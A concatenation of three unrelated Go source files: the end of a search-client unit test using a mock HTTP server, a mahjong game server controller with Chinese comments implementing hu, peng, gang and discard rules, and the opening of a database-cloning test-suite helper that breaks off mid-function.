searchArgs map[string]string
expectResults *SearchResults
expectError bool
}{
{
description: "ValidRequest",
searchArgs: map[string]string{
"value": "test",
},
code: http.StatusOK,
body: jsonresp.Response{Data: testSearch},
expectResults: &testSearch,
expectError: false,
},
{
description: "ValidRequestMultiArg",
searchArgs: map[string]string{
"value": "test",
"arch": "x86_64",
"signed": "true",
},
code: http.StatusOK,
body: jsonresp.Response{Data: testSearch},
expectResults: &testSearch,
expectError: false,
},
{
description: "InternalServerError",
searchArgs: map[string]string{"value": "test"},
code: http.StatusInternalServerError,
expectError: true,
},
{
description: "BadRequest",
searchArgs: map[string]string{},
code: http.StatusBadRequest,
expectError: true,
},
{
description: "InvalidValue",
searchArgs: map[string]string{"value": "aa"},
code: http.StatusBadRequest,
expectError: true,
},
}
// Loop over test cases
for _, tt := range tests {
t.Run(tt.description, func(t *testing.T) {
m := mockService{
t: t,
code: tt.code,
body: tt.body,
reqCallback: tt.reqCallback,
httpPath: "/v1/search",
}
m.Run()
defer m.Stop()
c, err := NewClient(&Config{AuthToken: testToken, BaseURL: m.baseURI})
if err != nil {
t.Errorf("Error initializing client: %v", err)
}
results, err := c.Search(context.Background(), tt.searchArgs)
if err != nil && !tt.expectError {
t.Errorf("Unexpected error: %v", err)
}
if err == nil && tt.expectError {
t.Errorf("Unexpected success. Expected error.")
}
if !reflect.DeepEqual(results, tt.expectResults) {
t.Errorf("Got created collection %v - expected %v", results, tt.expectResults)
}
})
}
}
|
package majiangserver
import (
cmn "common"
"logger"
"math"
//"rpc"
//"strconv"
)
type MaJiangController struct {
player *MaJiangPlayer
huController *HuController
}
func NewController(player *MaJiangPlayer) *MaJiangController {
controller := new(MaJiangController)
controller.player = player
controller.huController = NewHuController(player)
return controller
}
//检查能报吗
func (controller *MaJiangController) CheckBao() (bool, []*MaJiangCard) {
huPais := controller.CheckHu(false)
PrintCardsS("检查报时,能胡的牌:", huPais)
return huPais != nil && len(huPais) > 0, huPais
}
//报牌
func (controller *MaJiangController) Bao() {
//检查参数
player := controller.player
if player == nil {
logger.Error("controller.player is nil")
return
}
//锁定所有牌
for _, card := range player.cards {
card.flag = cmn.CBack | cmn.CLock
}
player.multipleCount[MTBao] = MinTangFanShu[MTBao]
}
//检查能否胡牌
func (controller *MaJiangController) CheckHu(isCheckQiHuKeAmount bool) []*MaJiangCard {
//检查参数的合法性
player := controller.player
if player == nil || player.cards == nil || len(player.cards) <= 0 {
logger.Error("data of player isn't init.")
return nil
}
//通过huController进行胡的计算
PrintCardsS("更新胡时的手牌:", player.cards)
PrintPatternsS("更新胡时的已碰或杠的牌:", player.showPatterns)
controller.huController.UpdateData(player.cards)
PrintPatternGroupsS("更新胡牌后的模式组:", controller.huController.patternGroups, false)
return player.GetHuCards(isCheckQiHuKeAmount)
}
//检查能否胡指定的牌
func (controller *MaJiangController) CheckHuSpecific(card *MaJiangCard) (result bool, ke int32) {
//检查参数
if card == nil {
logger.Error("card is nil.")
return
}
player := controller.player
if player == nil || player.room == nil {
logger.Error("MaJiangController.player or player room is nil")
return
}
huPais := controller.CheckHu(true)
if huPais == nil || len(huPais) <= 0 {
return
}
PrintCardS("CheckHuSpecific:检查能胡指定牌:", card)
PrintCardsS("全部能胡的牌:", huPais)
if card.cType == HongZhong {
// controller.huController.UpdateData(player.cards)
// PrintPatternGroupsS("更新胡牌后的模式组:", controller.huController.patternGroups, false)
// return player.GetHuCards(isCheckQiHuKeAmount)
var maxKe int32 = 0
tempCard := *card
for _, v := range huPais {
tempCard.SetHZReplaceValue(v.cType, v.value)
ke, _ = player.GetMaxHuOfPatternGroupByCard(&tempCard)
if ke > maxKe {
maxKe = ke
result = true
}
}
ke = maxKe
} else {
for _, v := range huPais {
if v.IsEqual(card) {
ke, _ = player.GetMaxHuOfPatternGroupByCard(card)
if ke > 0 {
result = true
}
}
}
}
//检查过水没有或升值
isZiMo := card.owner == nil || card.owner.id == player.id
if player.aroundState.IsOnlyZiMo() && !isZiMo {
result = false
}
if !isZiMo && !player.aroundState.IsGuoShuiHu() && !player.aroundState.IsShengZhiHu(ke) {
result = false
}
//logger.Error("玩家:%s 检查胡时,过水和升值的情况:是否是自摸:%s, 是否仅自摸:%s, 是否过水了:%s, 是否是升值:%s, 以前的颗数是:%d", player.client.GetName(), isZiMo, player.aroundState.IsOnlyZiMo(), player.aroundState.IsGuoShuiHu(), player.aroundState.IsShengZhiHu(ke), player.aroundState.huKe)
return
}
//胡牌
func (controller *MaJiangController) Hu(card *MaJiangCard) bool {
//检查参数
player := controller.player
if player == nil {
logger.Error("MaJiangController.player is nil")
return false
}
room := player.room
if room == nil {
logger.Error("MaJiangController.player.room is nil")
return false
}
//获取最大的胡的模式组,并修改player中的fixedpatterns和cards
var maxPatternGroup *MaJiangPatternGroup = nil
if card.IsHongZhong() {
var maxKe int32 = 0
huPais := controller.CheckHu(true)
if huPais == nil || len(huPais) <= 0 {
logger.Error("不能会牌啊!,怎么会执行胡操作呢!")
return false
}
tempCard := *card
for _, v := range huPais {
tempCard.SetHZReplaceValue(v.cType, v.value)
ke, patternGroup := player.GetMaxHuOfPatternGroupByCard(&tempCard)
if ke > maxKe {
maxKe = ke
maxPatternGroup = patternGroup
card.SetHZReplaceValue(v.cType, v.value)
}
}
} else {
_, maxPatternGroup = player.GetMaxHuOfPatternGroupByCard(card)
}
if maxPatternGroup == nil {
logger.Error("没哟胡的模式组哦!", ConvertToWord(card))
return false
}
//如果靠牌是两个,那么检查是否为对子,如果是对子,那么还可以胡碰牌(胡三个的)
//var lastPattern *MaJiangPattern = nil
lastPatterns := CalcPatternType(maxPatternGroup.kaoCards, card)
if len(lastPatterns) <= 0 {
logger.Error("最后一个/两个模式生成失败!")
cardList := []*MaJiangCard{card}
cardList = append(cardList, maxPatternGroup.kaoCards...)
lastPatterns = append(lastPatterns, NewPattern(PTUknown, cardList, false))
}
// if ptype != PTUknown {
// cardList := []*MaJiangCard{card}
// cardList = append(cardList, maxPatternGroup.kaoCards...)
// lastPattern = NewPattern(ptype, cardList, false)
// } else {
// logger.Error("胡牌的最有一个模式不应该是个未知的模式")
// PrintCardsS("靠牌:", maxPatternGroup.kaoCards)
// PrintCardS("胡牌:", card)
// //异常兼容代码
// cardList := []*MaJiangCard{card}
// cardList = append(cardList, maxPatternGroup.kaoCards...)
// lastPattern = NewPattern(ptype, cardList, false)
// }
//修改胡牌的flag,加一个
card.flag |= cmn.CHu
if room.state == RSBankerTianHuStage {
card.flag |= cmn.CTianHu
} else {
isZiMo := card.owner == nil || card.owner.id == player.id
if isZiMo {
card.flag |= cmn.CZiMoHu
//检查是否是杠上花
if player.aroundState.HaveGangShangHuaFlag() {
card.flag |= cmn.CGangShangHu
}
} else {
card.flag |= cmn.CDianPaoHu
if card.owner != nil && card.owner.aroundState.HaveGangShangPaoFlag() {
card.flag |= cmn.CGangShangPaoHu
}
}
}
//统计最终的名堂和翻数
_, _, remainMingTang := player.CalcMulitAndKeByPatternGroup(maxPatternGroup, card)
for k, v := range remainMingTang {
player.multipleCount[k] = v
}
//缓存胡的牌,因为在重登录的时候,需要下发给客户端
player.huCard = card
//合并模式
player.showPatterns = append(player.showPatterns, maxPatternGroup.patterns...)
if lastPatterns != nil {
player.showPatterns = append(player.showPatterns, lastPatterns...)
}
//清空手牌
player.cards = []*MaJiangCard{}
//统计点炮玩家,用于结算统计分数
if player.isChaJiaoHu {
for _, p := range room.players {
if !p.IsHu() && !p.HaveJiao() {
player.beiHuPlayers = append(player.beiHuPlayers, p)
}
}
} else {
if player.HaveZiMoFeatureForHu() {
for _, p := range room.players {
if !p.IsHu() {
player.beiHuPlayers = append(player.beiHuPlayers, p)
}
}
} else {
if card.owner != nil && !card.owner.IsHu() {
player.beiHuPlayers = append(player.beiHuPlayers, card.owner)
} else {
logger.Error("竟然都是杠上炮,抢杠或点炮了,这个牌竟然还不知道是谁的!")
}
}
}
return true
// PrintPatternsS("胡牌时玩家的显示牌如下:", player.showPatterns)
// PrintCardsS("当前玩家的手牌:", player.cards)
// logger.Info("玩家%s 胡牌了:", player.id, ConvertToWord(card))
}
//检查暗杠牌
func (controller *MaJiangController) CheckAnGang(addiCard *MaJiangCard) (canGang bool, result []*MaJiangCard) {
result = make([]*MaJiangCard, 0)
//检查参数
player := controller.player
if player == nil {
logger.Error("MaJiangController.player is nil")
return
}
cardAmountInfo := player.cardAmountInfo
if addiCard != nil {
cardAmountInfo = NewCardAmountStatisticsByCards(append(player.cards, addiCard), false)
}
//能够硬杠的
yingGang := cardAmountInfo.GetCardsBySpecificAmount(4, nil)
//需要贴鬼杠的
var hongZhongAmount int32 = 0
if player.IsOpenHongZhongCheck {
hongZhongAmount = cardAmountInfo.GetCardAmountByType(HongZhong)
}
canGangCards := cardAmountInfo.GetCardsBySpecificAmount(int32(math.Max(float64(1), float64(4-hongZhongAmount))), yingGang)
canGangCards = append(canGangCards, yingGang...)
types := player.GetCurMayOwnTypes()
for _, c := range canGangCards {
if c.cType == HongZhong {
continue
}
if Exist(types, c.cType) {
result = append(result, c)
}
}
//报牌后检查时候还能够进行杠
canGang = len(result) > 0
if canGang {
result = controller.FilterNoGangForBaoPlayer(result, 4)
}
return len(result) > 0, result
}
//进行暗杠牌
func (controller *MaJiangController) AnGang(card *MaJiangCard) (result *MaJiangPattern) {
return controller.Gang(card, 4)
}
//检查明杠牌
func (controller *MaJiangController) CheckMingGang(card *MaJiangCard) (result, isNeedHongZhong bool) {
//检查参数
if card == nil {
logger.Error("MaJiangController.card is nil")
}
player := controller.player
if player == nil {
logger.Error("MaJiangController.player is nil")
return
}
//红中不能被明杠
if card.IsHongZhong() {
return
}
//检查过水没有
if !player.aroundState.IsGuoShuiPengGang(card) {
return
}
cardAmount := player.cardAmountInfo.GetCardAmount(card.cType, card.value)
if cardAmount <= 0 {
return
}
isNeedHongZhong = cardAmount < int32(3)
var hongZhongAmount int32 = 0
if player.IsOpenHongZhongCheck && isNeedHongZhong {
hongZhongAmount = player.cardAmountInfo.GetCardAmountByType(HongZhong)
}
if hongZhongAmount+cardAmount >= 3 {
types := player.GetCurMayOwnTypes()
if Exist(types, card.cType) {
filtered := controller.FilterNoGangForBaoPlayer([]*MaJiangCard{card}, 3)
result = len(filtered) > 0
return
}
}
return
}
//执行明扛
func (controller *MaJiangController) MingGang(card *MaJiangCard) (result *MaJiangPattern) {
return controller.Gang(card, 3)
}
//筛查报牌玩家不能够杠的牌
func (controller *MaJiangController) FilterNoGangForBaoPlayer(gangCards []*MaJiangCard, needCardAmount int32) (result []*MaJiangCard) {
result = make([]*MaJiangCard, 0)
if gangCards == nil || len(gangCards) <= 0 {
return
}
result = make([]*MaJiangCard, len(gangCards))
copy(result, gangCards)
player := controller.player
if controller.player == nil {
logger.Error("MaJiangController.FilterNoGangForBaoPlayer: controller.player is nil")
return
}
if player.HaveBao() {
tempResult := make([]*MaJiangCard, 0)
for _, gangCard := range gangCards {
//拷贝一个副本
tempCards := make([]*MaJiangCard, len(player.cards))
copy(tempCards, player.cards)
//从手牌里移除扛牌
removedCards := make([]*MaJiangCard, 0)
//removedHongZhongCards := make([]*MaJiangCard, 0)
tempCards, removedCards = RemoveCardsByType(tempCards, gangCard.cType, gangCard.value, needCardAmount)
//检查本牌是否足够,不足够则用红中替代
needRemovedHongZhongAmount := needCardAmount - int32(len(removedCards))
if needRemovedHongZhongAmount > 0 {
tempCards, _ = RemoveCardsByType(tempCards, HongZhong, 0, needRemovedHongZhongAmount)
}
huChecker := NewHuController(player)
huChecker.UpdateData(tempCards)
haveHu := huChecker.patternGroups != nil && len(huChecker.patternGroups) > 0
if haveHu {
tempResult = append(tempResult, gangCard)
}
}
result = tempResult
}
return
}
//进行杠牌
func (controller *MaJiangController) Gang(card *MaJiangCard, needCardAmount int32) (result *MaJiangPattern) {
//检查参数
if card == nil {
logger.Error("MaJiangController.AnGang card is nil")
return
}
player := controller.player
if player == nil {
logger.Error("MaJiangController.player is nil")
return
}
//红中不能进行暗杠
if card.IsHongZhong() {
logger.Error("红中不能够暗杠红中这张牌", ConvertToWord(card))
}
//从手牌里移除扛牌
removedCards := make([]*MaJiangCard, 0)
removedHongZhongCards := make([]*MaJiangCard, 0)
player.cards, removedCards = RemoveCardsByType(player.cards, card.cType, card.value, needCardAmount)
//检查本牌是否足够,不足够则用红中替代
needRemovedHongZhongAmount := needCardAmount - int32(len(removedCards))
if needRemovedHongZhongAmount > 0 {
player.cards, removedHongZhongCards = RemoveCardsByType(player.cards, HongZhong, 0, needRemovedHongZhongAmount)
}
//设置红中的替换值并锁定替换
for _, hongZhongCard := range removedHongZhongCards {
if hongZhongCard == nil {
continue
}
hongZhongCard.SetHZReplaceValue(card.cType, card.value)
hongZhongCard.flag = cmn.CLockHongZhongValue | cmn.CLock | cmn.CPositive
}
//保存杠牌的结果
resultCards := append(removedCards, removedHongZhongCards...)
isMingGang := needCardAmount == 3
if isMingGang {
resultCards = append(resultCards, card)
result = NewPattern(PTGang, resultCards, true)
} else {
result = NewPattern(PTAnGang, resultCards, true)
}
//添加一个显示的模式
player.showPatterns = append(player.showPatterns, result)
//清除过水,升值等标志
player.aroundState.ClearGuoShuiAndShengZhiFlag(player.HaveBao())
//记录杠,用于确定是否杠上花或杠上炮
//player.aroundState.gangCard = card
player.aroundState.AddGangFlag(card)
//手牌变了后需要从新更新hu控制器
controller.huController.UpdateData(player.cards)
//重现计算缓存的卡牌数量
player.cardAmountInfo.CalcCardAmountByCards(player.cards, false)
return
}
//检查补杠
func (controller *MaJiangController) CheckBuGang(addiCard *MaJiangCard) (canBuGang bool, result []*MaJiangCard) {
result = make([]*MaJiangCard, 0)
player := controller.player
if player == nil {
logger.Error("MaJiangController.player is nil")
return
}
//获取可以补杠的牌
pengCards := player.GetPengCardsForAlready()
if len(pengCards) <= 0 {
return
}
//获取所有手牌
cards := player.cards
if addiCard != nil {
cards = append(player.cards, addiCard)
}
haveHongZhongInHand := false
for _, handCard := range cards {
for _, c := range pengCards {
if handCard.IsEqual(c) {
if !IsExist(result, handCard) {
result = append(result, handCard)
}
}
}
if player.IsOpenHongZhongCheck && !haveHongZhongInHand && handCard.cType == HongZhong {
for _, c := range pengCards {
if !IsExist(result, c) {
result = append(result, c)
}
}
haveHongZhongInHand = true
}
}
return len(result) > 0, result
}
//执行补杠
func (controller *MaJiangController) BuGang(card *MaJiangCard) (buCard *MaJiangCard, result *MaJiangPattern) {
//检查参数
if card == nil {
logger.Error("MaJiangController.card is nil.")
return
}
player := controller.player
if player == nil {
logger.Error("MaJiangController.player is nil")
return
}
//检查是否使用红中进行补杠的
removedCards := make([]*MaJiangCard, 0)
cType, cValue := card.CurValue()
//先移除本牌,如果没有再移除红中
player.cards, removedCards = RemoveCardsByType(player.cards, cType, cValue, 1)
if len(removedCards) <= 0 {
//移除一张红中
player.cards, removedCards = RemoveCardsByType(player.cards, HongZhong, 0, 1)
}
//添加一张补杠的牌
if len(removedCards) != 1 {
logger.Error("没有此牌%s,如何补杠.被移除的牌的数量:%d", ConvertToWord(card), len(removedCards))
PrintCardsS("此时玩家手上的牌是:", player.cards)
} else {
buCard = removedCards[0]
if buCard.IsHongZhong() {
buCard.SetHZReplaceValue(cType, cValue)
buCard.flag = cmn.CLockHongZhongValue | cmn.CLock | cmn.CPositive
}
result = player.AddOneBuGangCard(buCard)
}
//手牌变了后需要从新更新hu控制器
controller.huController.UpdateData(player.cards)
//重现计算缓存的卡牌数量
player.cardAmountInfo.CalcCardAmountByCards(player.cards, false)
return
}
//检查碰
func (controller *MaJiangController) CheckPeng(card *MaJiangCard) (canPeng, isNeedHongZhong bool) {
//检查参数
if card == nil {
logger.Error("MaJiangController.card is nil.")
return
}
player := controller.player
if player == nil {
logger.Error("MaJiangController.player is nil")
return
}
//红中不去检查碰
if card.IsHongZhong() {
return
}
//检查是否过水
if !player.aroundState.IsGuoShuiPengGang(card) {
return
}
types := player.GetCurMayOwnTypes()
if Exist(types, card.cType) {
selfAmount := player.cardAmountInfo.GetCardAmount(card.cType, card.value)
//没有本牌
if selfAmount <= 0 {
return false, false
}
isNeedHongZhong = selfAmount < 2
if !isNeedHongZhong {
return true, false
}
if player.IsOpenHongZhongCheck {
hongZhongAmount := player.cardAmountInfo.GetCardAmountByType(HongZhong)
return hongZhongAmount+selfAmount >= 2, true
}
}
return
}
//碰牌
func (controller *MaJiangController) Peng(card *MaJiangCard) (result *MaJiangPattern) {
//检查参数
if card == nil {
logger.Error("MaJiangController.card is nil.")
return
}
player := controller.player
if player == nil {
logger.Error("MaJiangController.player is nil")
return
}
//移除手上的牌
removedCards := make([]*MaJiangCard, 0)
removedHongZhongCards := make([]*MaJiangCard, 0)
player.cards, removedCards = RemoveCardsByType(player.cards, card.cType, card.value, 2)
//检查本牌是否足够,不足够则用红中替代
needRemovedHongZhongAmount := 2 - int32(len(removedCards))
if needRemovedHongZhongAmount > 0 {
player.cards, removedHongZhongCards = RemoveCardsByType(player.cards, HongZhong, 0, needRemovedHongZhongAmount)
}
//设置红中的替换值并锁定替换
for _, hongZhongCard := range removedHongZhongCards {
if hongZhongCard == nil {
continue
}
hongZhongCard.SetHZReplaceValue(card.cType, card.value)
hongZhongCard.flag = cmn.CLockHongZhongValue | cmn.CLock | cmn.CPositive
}
//保存碰牌的结果
pengCards := append(removedCards, removedHongZhongCards...)
pengCards = append(pengCards, card)
result = NewPattern(PTKan, pengCards, true)
//添加一个显示的模式
player.showPatterns = append(player.showPatterns, result)
//清除过水,升值等标志
player.aroundState.ClearGuoShuiAndShengZhiFlag(player.HaveBao())
//手牌变了后需要从新更新hu控制器
controller.huController.UpdateData(player.cards)
//重现计算缓存的卡牌数量
player.cardAmountInfo.CalcCardAmountByCards(player.cards, false)
return
}
//计算胡牌的列模式
func CalcPatternType(kaoCards []*MaJiangCard, huCard *MaJiangCard) (result []*MaJiangPattern) {
result = []*MaJiangPattern{}
if huCard == nil {
logger.Error("MaJiangController.card is nil.")
return
}
kaoCardsAmount := len(kaoCards)
if kaoCardsAmount <= 0 || kaoCardsAmount > 4 {
logger.Error("kaoCardsAmount is empty or greater 4.")
return
}
//检查对子
cardList := []*MaJiangCard{huCard}
cardList = append(cardList, kaoCards...)
switch kaoCardsAmount {
case 1:
if kaoCards[0].IsEqual(huCard) {
result = append(result, NewPattern(PTPair, cardList, false))
return
}
case 2:
kaoCard1 := kaoCards[0]
kaoCard2 := kaoCards[1]
//检查是不是碰胡
if kaoCard1.IsEqual(kaoCard2) {
//碰胡
if kaoCard1.IsEqual(huCard) {
result = append(result, NewPattern(PTKan, cardList, false))
return
}
}
//检查顺子
//检查三张牌是否都花色相同
if !(kaoCard1.IsSameHuaSe(kaoCard2) && kaoCard1.IsSameHuaSe(huCard)) {
return
}
offset := kaoCard1.value - kaoCard2.value
switch offset {
case 1, -1, 2, -2:
result = append(result, NewPattern(PTSZ, cardList, false))
}
case 4:
AAPatterns, _ := SplitToAA_A(kaoCards)
if len(AAPatterns) == 2 {
p1 := AAPatterns[0]
p2 := AAPatterns[1]
if huCard.IsEqual(p1.cards[0]) {
result = append(result, NewPattern(PTKan, append(p1.cards, huCard), false))
result = append(result, NewPattern(PTPair, p2.cards, false))
} else if huCard.IsEqual(p2.cards[0]) {
result = append(result, NewPattern(PTKan, append(p2.cards, huCard), false))
result = append(result, NewPattern(PTPair, p1.cards, false))
}
}
default:
logger.Error("最后的单牌数量只能是1, 2, 4个!")
}
return
}
//获取一个模式的拷牌
func GetKaoCards(pattern *MaJiangPattern, card *MaJiangCard) (kaoCard []*MaJiangCard) {
kaoCard = make([]*MaJiangCard, 0)
for i, c := range pattern.cards {
if c.IsEqual(card) {
kaoCard = append(kaoCard, pattern.cards[:i]...)
kaoCard = append(kaoCard, pattern.cards[i+1:]...)
break
}
}
return
}
//查叫
func (controller *MaJiangController) ChaJiao() {
player := controller.player
if player == nil {
logger.Error("MaJiangController.player is nil")
return
}
huPatternGroup, card := player.GetMaxHuOfPatternGroup()
if huPatternGroup == nil || card == nil {
return
}
player.isChaJiaoHu = true
controller.Hu(card)
}
//获取一个出牌
func (controller *MaJiangController) GetChuPai() *MaJiangCard {
player := controller.player
if player == nil {
logger.Error("MaJiangController.player is nil.")
return nil
}
if player.cards == nil || len(player.cards) <= 0 {
return nil
}
for i := len(player.cards) - 1; i >= 0; i-- {
if !player.cards[i].IsLockChu() {
return player.cards[i]
}
}
return nil
}
//检查能出指定牌吗
func (controller *MaJiangController) CheckChu(card *MaJiangCard) bool {
//检查参数的合法性
player := controller.player
if player == nil {
logger.Error("MaJiangController.player is nil.")
return false
}
//查找出能出的牌
chuPais := FindCards(player.cards, card.cType, card.value)
if chuPais == nil || len(chuPais) <= 0 {
logger.Error("没有此牌:", ConvertToWord(card))
return false
}
var finalChuPai *MaJiangCard = nil
for _, chuPai := range chuPais {
if !chuPai.IsLockChu() {
finalChuPai = chuPai
break
}
}
if finalChuPai == nil {
logger.Error("没有此牌,或者此牌已经被锁定了!", ConvertToWord(card))
return false
}
return true
}
//出牌
func (controller *MaJiangController) ChuPai(card *MaJiangCard) (finalChuPai *MaJiangCard) {
//检查参数的合法性
player := controller.player
if player == nil {
logger.Error("MaJiangController.player is nil.")
return
}
//查找出能出的牌
chuPais := FindCards(player.cards, card.cType, card.value)
if chuPais == nil || len(chuPais) <= 0 {
logger.Error("没有此牌:", ConvertToWord(card))
return
}
for _, chuPai := range chuPais {
if !chuPai.IsLockChu() {
finalChuPai = chuPai
break
}
}
if finalChuPai == nil {
logger.Error("没有此牌,或者此牌已经被锁定了!", ConvertToWord(card))
return
}
//从手里移除此牌
//PrintCardsS("出了一张牌之前胡更新器里的牌是:", controller.huController.originCards)
for i, c := range player.cards {
if c.IsEqual(finalChuPai) && !c.IsLockChu() {
player.cards = append(player.cards[:i], player.cards[i+1:]...)
break
}
}
player.room.activeCard = finalChuPai
player.AddChuCard(finalChuPai)
//PrintCardsS("出了一张牌后手里的牌是:", player.cards)
//PrintCardsS("原来胡更新器里的手牌是:", controller.huController.originCards)
//手牌变了后需要从新更新hu控制器
controller.huController.UpdateData(player.cards)
//重现计算缓存的卡牌数量
player.cardAmountInfo.CalcCardAmountByCards(player.cards, false)
return
}
//生成最终的胡牌模式组
func (controller *MaJiangController) GenerateFinalPatternGroup() (patternGroup *MaJiangPatternGroup) {
//检查输入参数是否合法
player := controller.player
if player == nil {
logger.Error("controller.player is nil.")
return
}
//产生最终的胡的模式组
patternsList := make([]*MaJiangPattern, 0)
patternsList = append(patternsList, player.showPatterns...)
if player.cards != nil && len(player.cards) > 0 {
maxPg, huCard := player.GetMaxHuOfPatternGroup()
if maxPg != nil && huCard != nil {
patternsList = append(patternsList, maxPg.patterns...)
huCard.flag |= cmn.CHu
//ptype := CalcPatternType(maxPg.kaoCards, huCard)
lastPatterns := CalcPatternType(maxPg.kaoCards, huCard)
patternsList = append(patternsList, lastPatterns...)
} else {
patternsList = append(patternsList, NewPattern(PTSingle, player.cards, false))
}
}
patternGroup = NewPatternGroup(patternsList)
return
}
|
package testingsuite
import (
"context"
"fmt"
"log"
"math/rand"
"os"
"runtime"
"strings"
"time"
"github.com/transcom/mymove/pkg/random"
"github.com/gobuffalo/envy"
"github.com/gobuffalo/pop/v5"
"github.com/gobuffalo/validate/v3"
"github.com/gofrs/flock"
// Anonymously import lib/pq driver so it's available to Pop
_ "github.com/lib/pq"
)
const charset = "abcdefghijklmnopqrstuvwxyz" +
"0123456789"
//RA Summary: gosec - G404 - Insecure random number source (rand)
//RA: gosec detected use of the insecure package math/rand rather than the more secure cryptographically secure pseudo-random number generator crypto/rand.
//RA: This particular usage is mitigated by sourcing the seed from crypto/rand in order to create the new random number using math/rand.
//RA: Second, as part of the testing suite, the need for a secure random number here is not necessary.
//RA Developer Status: Mitigated
//RA Validator: jneuner@mitre.org
//RA Validator Status: Mitigated
//RA Modified Severity: CAT III
// #nosec G404
var seededRand = rand.New(random.NewCryptoSeededSource())
var fileLock = flock.New(os.TempDir() + "/server-test-lock.lock")
// StringWithCharset returns a random string
// https://www.calhoun.io/creating-random-strings-in-go/
func StringWithCharset(length int, charset string) string {
b := make([]byte, length)
for i := range b {
b[i] = charset[seededRand.Intn(len(charset))]
}
return string(b)
}
// PopTestSuite is a suite for testing
type PopTestSuite struct {
BaseTestSuite
PackageName
origConn *pop.Connection
lowPrivConn *pop.Connection
highPrivConn *pop.Connection
origConnDetails *pop.ConnectionDetails
lowPrivConnDetails *pop.ConnectionDetails
highPrivConnDetails *pop.ConnectionDetails
// Enable this flag to avoid the use of the DB_USER_LOW_PRIV and DB_PASSWORD_LOW_PRIV
// environment variables and instead fall back to the use of a single, high privileged
// PostgreSQL database role. This role used to commonly be called the "migrations user".
// However, this grants too many permissions to the database from the application. Therefore,
// we created a new user with fewer permissions that are used by most tests.
//
// There is one type of situation where we still want to use the PostgreSQL role: areas of the
// code that are testing migrations. In this situation, the following flag can be set to true
// to enable the use of the role with elevated permissions.
//
// For more details, please see https://dp3.atlassian.net/browse/MB-5197
useHighPrivsPSQLRole bool
}
func dropDB(conn *pop.Connection, destination string) error {
dropQuery := fmt.Sprintf("DROP DATABASE IF EXISTS %s;", destination)
dropErr := conn.RawQuery(dropQuery).Exec()
if dropErr != nil {
return dropErr
}
return nil
}
func cloneDatabase(conn *pop.Connection, source, destination string) error {
// Now that the lock is available clone the DB
// Drop and then Create the DB
if dropErr := dropDB(conn, destination); dropErr != nil {
return dropErr
}
createErr := conn.RawQuery(fmt.Sprintf("CREATE DATABASE %s WITH TEMPLATE %s;", destination, source)).Exec()
if createErr != nil {
return createErr
}
return nil
}
// PackageName represents the project-relative name of a Go package.
type PackageName string
func (pn PackageName) String() string {
return string(pn)
}
// Suffix returns a new PackageName with an underscore and the suffix appended to the end
// suffix should be a snake case string
func (pn PackageName) Suffix(suffix string) PackageName {
return PackageName(pn.String() + "_" + suffix)
}
// CurrentPackage returns the project-relative name of the caller's package.
//
// "github.com/transcom/mymove/pkg/" is removed from the beginning of the absolute package name, so
// the return value will be e.g. "handlers/internalapi".
func CurrentPackage() PackageName {
pc, _, _, _ := runtime.Caller(1)
caller := runtime.FuncForPC(pc)
fnName := strings.Replace(caller.Name(), "github.com/transcom/mymove/pkg/", "", 1)
pkg := strings.Split(fnName, ".")[0]
return PackageName(pkg)
}
// PopTestSuiteOption is type intended to be used to change a PopTestSuite object.
type PopTestSuiteOption func(*PopTestSuite)
// WithHighPrivPSQLRole is a functional option that can be passed into the NewPopTestSuite
// function to create a PopTestSuite that only uses the privileged SQL connection.
func WithHighPrivPSQLRole() PopTestSuiteOption {
return func(pts *PopTestSuite) {
// Mark a flag that indicates that we are only using a single privileged role.
pts.useHighPrivsPSQLRole = true
// Disconnect the low privileged connection and replace its connection and connection
// details with those of the high privileged connection.
if err := pts.lowPrivConn.Close(); err != nil {
log.Panic(err)
}
pts.lowPrivConn = pts.highPrivConn
pts.lowPrivConnDetails = pts.highPrivConnDetails
}
}
// NewPopTestSuite returns a new PopTestSuite
func NewPopTestSuite(packageName PackageName, opts ...PopTestSuiteOption) PopTestSuite {
// Try to obtain the lock in this method within 10 minutes
lockCtx, cancel := context.WithTimeout(context.Background(), 600*time.Second)
defer cancel()
// Continually check if the lock is available
_, lockErr := fileLock.TryLockContext(lockCtx, 678*time.Millisecond)
if lockErr != nil {
log.Panic(lockErr)
}
dbDialect := "postgres"
dbName, dbNameErr := envy.MustGet("DB_NAME")
if dbNameErr != nil {
log.Panic(dbNameErr)
}
dbNameTest := envy.Get("DB_NAME_TEST", dbName)
dbHost, dbHostErr := envy.MustGet("DB_HOST")
if dbHostErr != nil {
log.Panic(dbHostErr)
}
dbPort, dbPortErr := envy.MustGet("DB_PORT")
if dbPortErr != nil {
log.Panic(dbPortErr)
}
dbPortTest := envy.Get("DB_PORT_TEST", dbPort)
dbUser, dbUserErr := envy.MustGet("DB_USER")
if dbUserErr != nil {
log.Panic(dbUserErr)
}
dbUserLowPriv, dbUserLowPrivErr := envy.MustGet("DB_USER_LOW_PRIV")
if dbUserLowPrivErr != nil {
log.Panic(dbUserLowPrivErr)
}
dbPassword, dbPasswordErr := envy.MustGet("DB_PASSWORD")
if dbPasswordErr != nil {
log.Panic(dbPasswordErr)
}
dbPasswordApp, dbPasswordAppErr := envy.MustGet("DB_PASSWORD_LOW_PRIV")
if dbPasswordAppErr != nil {
log.Panic(dbPasswordAppErr)
}
dbSSLMode := envy.Get("DB_SSL_MODE", "disable")
dbOptions := map[string]string{
"sslmode": dbSSLMode,
}
log.Printf("package %s is attempting to connect to database %s", packageName.String(), dbNameTest)
origConnDetails := pop.ConnectionDetails{
Dialect: dbDialect,
Driver: "postgres",
Database: dbNameTest,
Host: dbHost,
Port: dbPortTest,
User: dbUser,
Password: dbPassword,
Options: dbOptions,
}
origConn, origConnErr := pop.NewConnection(&origConnDetails)
if origConnErr != nil {
log.Panic(origConnErr)
}
if openErr := origConn.Open(); openErr != nil {
log.Panic(openErr)
}
// Doing this before cloning should pre-clean the DB for all tests
log.Printf("attempting to truncate the database %s", dbNameTest)
errTruncateAll := origConn.TruncateAll()
if errTruncateAll != nil {
log.Panicf("failed to truncate database '%s': %#v", dbNameTest, errTruncateAll)
}
uniq := StringWithCharset(6, charset)
dbNamePackage := fmt.Sprintf("%s_%s_%s", dbNameTest, strings.Replace(packageName.String(), "/", "_", -1), uniq)
log.Printf("attempting to clone database %s to %s... ", dbNameTest, dbNamePackage)
if err := cloneDatabase(origConn, dbNameTest, dbNamePackage); err != nil {
log.Panicf("failed to clone database '%s' to '%s': %#v", dbNameTest, dbNamePackage, err)
}
log.Println("success")
// disconnect from the original DB
if err := origConn.Close(); err != nil {
log.Panic(err)
}
// Release the lock so other tests can clone the DB
